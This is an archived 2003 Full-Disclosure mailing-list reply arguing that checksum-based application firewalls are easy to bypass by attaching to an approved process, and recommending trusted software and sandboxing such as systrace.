RE: [Full-Disclosure] Application level firewall
From: Adam Lydick (adam.lydick_at_verizon.net)
Date: 10/19/03
- Previous message: Paul Schmehl: "Re: [Full-Disclosure] NASA.GOV SQL Injections"
- In reply to: Andriy Bilous: "RE: [Full-Disclosure] Application level firewall"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: Andriy Bilous <Andriy.Bilous@sabre-merlin.de> Date: Sun, 19 Oct 2003 07:56:54 -0700
I don't understand why anyone would bother checking application
checksums for access control. In fact, I'm not sure why anyone would
bother running an "application firewall" at all. Ponder this: as long as
debug privs aren't blocked between processes with the same uid by the
application "firewall" you can just attach to an approved process and
hijack its flow of control (that should be true of both linux and
win32).
I believe it is bad idea to rely on such tools to protect your system.
They are easy to work around (and this fact is documented, see my
comment above and the list archives). I think a better solution (as a
start) is to use software from authors that you trust. A even better
(more technical) solution are the various forms of sandboxing -- either
userland with managed code or in kernelspace with tools such as
systrace.
Trying to audit natively executing code on the fly sounds like a battle
you are going to lose. Maybe a clever developer could do something like
valgrind and jit x86-x86 and intercept syscalls (this could allow for a
somewhat slow systrace implementation in userland).
(Take with a grain of salt, I haven't tested any software such as ZA and
its brethern lately, so they might be doing some more magic that plugs
those holes -- but it seems likely that they cannot fix all of them
without patching a great deal of the OS)
Just my standard complaints. Cheers.
-- Adam Ly*** On Sat, 2003-10-18 at 08:19, Andriy Bilous wrote: > Some personal firewalls on windows are using checksums for every application > trying to access network device. Yesterday i've upgraded mirc and have got a > warning about this. iptables, unfortunately, doesn't provide such a > functionality out of the box. luckily, it have an open API and extends well > over the kernel modules facility. what you speak about has a different name > - "content filtering" > > Andriy Bilous <trim> _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
- Previous message: Paul Schmehl: "Re: [Full-Disclosure] NASA.GOV SQL Injections"
- In reply to: Andriy Bilous: "RE: [Full-Disclosure] Application level firewall"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
